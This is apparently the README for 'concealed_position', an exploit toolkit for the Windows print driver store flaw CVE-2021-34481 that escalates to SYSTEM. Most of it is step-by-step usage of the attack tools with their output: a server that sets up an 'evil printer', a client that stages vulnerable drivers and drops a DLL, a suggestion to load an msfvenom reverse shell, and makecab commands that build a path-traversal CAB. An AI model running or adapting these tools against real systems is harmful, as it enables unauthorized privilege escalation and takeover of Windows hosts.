Arguably, yes. The driver store is a "trusted collection of ... third-party driver packages" that requires administrator access to modify. Using GetPrinterDriver a low privileged attacker can stage arbitrary drivers into the store. This, to me, crosses a clear security boundary.

Microsoft seemed to agree when they issued CVE-2021-34481.

Although... it's arguable that this is simply a feature of the system and not a vulnerability at all. It really doesn't matter all that much. An attacker can escalate to SYSTEM on standard Windows installs.


Which versions of Windows are affected by CVE-2021-34481?

At least Windows 8.1 and above.


How do I use these tools?

Simple! So simple there will be many paragraphs to describe it!


CP Server

First, let's look at cp_server's command line options:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe
_______ _______ __ _ _______ _______ _______ ___ _______ ______
| || || | | || || || _ || | | || |
| || _ || |_| || || ___|| |_| || | | ___|| _ |
| || | | || || || |___ | || | | |___ | | | |
| _|| |_| || _ || _|| ___|| || |___ | ___|| |_| |
| |_ | || | | || |_ | |___ | _ || || |___ | |
|_______||_______||_| |__||_______||_______||__| |__||_______||_______||______|
_______ _______ _______ ___ _______ ___ _______ __ _
| || || || | | || | | || | | |
| _ || _ || _____|| | |_ _|| | | _ || |_| |
| |_| || | | || |_____ | | | | | | | | | || |
| ___|| |_| || _____ || | | | | | | |_| || _ |
| | | | _____| || | | | | | | || | | |
|___| |_______||_______||___| |___| |___| |_______||_| |__| server!

CLI options:
-h, --help Display the help message
-e, --exploit arg The exploit to use
-c, --cabs arg (=.\cab_files) The location of the cabinet files

Exploits available:
ACIDDAMAGE
POISONDAMAGE
RADIANTDAMAGE
SLASHINGDAMAGE

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

Above you can see the server requires two options:

  1. The exploit to configure the printer for
  2. A path to this repository's cab_files (.\cab_files\ is the default)

For example, let's say we wanted to configure an evil printer that would serve up the ACIDDAMAGE driver. Just do this:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_server.exe -e ACIDDAMAGE

[+] Creating temporary space...
[+] Expanding .\cab_files\ACIDDAMAGE\LMUD1o40.cab
[+] Pushing into the driver store
[+] Cleaning up tmp space
[+] Installing print driver
[+] Driver installed!
[+] Installing shared printer
[+] Shared printer installed!
[+] Automation Done.
[!] IMPORTANT MANUAL STEPS!
[0] In Advanced Sharing Settings, Turn off password protected sharing.
[1] Ready to go!

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

And that's it, you'll see a new printer on your system:

PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin> Get-Printer

Name                           ComputerName    Type    DriverName                  PortName         Shared   Published
----                           ------------    ----    ----------                  --------         ------   ---------
ACIDDAMAGE                                     Local   Lexmark Universal v2        LPT1:            True     False
CutePDF Writer                                 Local   CutePDF Writer v4.0         CPW4:            False    False
OneNote for Windows 10                         Local   Microsoft Software Pri...   Microsoft.Of...  False    False
Microsoft XPS Document Writer                  Local   Microsoft XPS Document...   PORTPROMPT:      False    False
Microsoft Print to PDF                         Local   Microsoft Print To PDF      PORTPROMPT:      False    False
Fax                                            Local   Microsoft Shared Fax D...   SHRFAX:          False    False


PS C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

Note that there is one manual step that cp_server prompts you to do. Because I'm a junk hacker, I couldn't figure out how to programmatically set the "Advanced Sharing Settings" -> "Turn off password protected sharing". You'll have to do that yourself!

The process for using SLASHINGDAMAGE is a little different. You'll need to first install CutePDF Writer (find the installers in the 3rd party directory). Then run cp_server and then you'll still need to follow a couple of manual steps and reboot.


CP Client

The client is similarly easy to use. Let's look at its command line options:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_client.exe

CLI options:
-h, --help Display the help message
-r, --rhost arg The remote evil printer address
-n, --name arg The remote evil printer name
-e, --exploit arg The exploit to use
-l, --local No remote printer. Local attack only.
-d, --dll arg Path to user provided DLL to execute.

Exploits available:
ACIDDAMAGE
POISONDAMAGE
RADIANTDAMAGE

First, I'd like to address the --dll option. The client has an embedded payload that will simply write the C:\result.txt file. However, users can provide their own DLL via this option. A good example of something you might want to use is an x64 reverse shell produced by msfvenom. But for the rest of this we'll just assume the embedded payload.

cp_client has two modes: remote and local. The remote option is the most interesting because it adds the vulnerable driver to the driver store (thus executing the bring your own print driver vulnerability), so we'll go with that first. Let's say I want to connect back to the evil ACIDDAMAGE printer we configured previously. I just need to provide:

  1. The exploit I want to use
  2. The evil printer IP address
  3. The name of the evil shared printer

Like this!

C:\Users\albinolobster\Desktop>cp_client.exe -r 10.0.0.9 -n ACIDDAMAGE -e ACIDDAMAGE

[+] Checking if driver is already installed
[-] Driver is not available.
[+] Call back to evil printer @ \\10.0.0.9\ACIDDAMAGE
[+] Staging driver in driver store
[+] Installing the staged driver
[+] Driver installed!
[+] Starting AcidDamage
[+] Checking if C:\ProgramData\Lexmark Universal v2\ exists
[-] Target directory doesn't exist. Trigger install.
[+] Installing printer
[+] Read in C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl
[+] Searching file contents
[+] Updating file contents
[+] Dropping updated gpl
[+] Dropping Dll.dll to disk
[+] Staging dll in c:\tmp
[+] Installing printer
[!] Mucho success!

That's it! To execute a local only attack, you just need to provide the exploit:

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>cp_client.exe -l -e ACIDDAMAGE

[+] Checking if driver is already installed
[+] Driver installed!
[+] Starting AcidDamage
[+] Checking if C:\ProgramData\Lexmark Universal v2\ exists
[-] Target directory doesn't exist. Trigger install.
[+] Installing printer
[+] Read in C:\ProgramData\Lexmark Universal v2\Universal Color Laser.gdl
[+] Searching file contents
[+] Updating file contents
[+] Dropping updated gpl
[+] Dropping Dll.dll to disk
[+] Staging dll in c:\tmp
[+] Installing printer
[!] Mucho success!

C:\Users\albinolobster\concealed_position\build\x64\Release\bin>

Why doesn't the client have a SLASHINGDAMAGE option?

SLASHINGDAMAGE doesn't need a special client for exploitation. You can just use the UI or the command line to connect to the remote printer and that's it! Unfortunately, if you want to roll a custom payload you'll need to update the CAB in the cab_files directory. But that's easy. Something like this:

echo "evil.dll" "../../evil.dll" > files.txt
makecab /f files.txt
move disk1/1.cab exploit.cab

It's probably important to know that the version of SLASHINGDAMAGE in the repo drops ualapi.dll into SYSTEM32 and, when executed on reboot, it drops the C:\result.txt file.


Pull Requests and Bugs

Do you want to submit a pull request or file a bug? Great! I appreciate that, but if you don't provide sufficient details to reproduce a bug or explain why a pull request should be accepted then there is a 100% chance I'll close your issue without comment. I appreciate you, but I'm also pretty busy.


Other things

One thing to note is that the inject_me dll is actually embedded in the cp_client as a C array. If you update inject_me, you'll need to manually update the C array as well (just use xxd to generate the array).


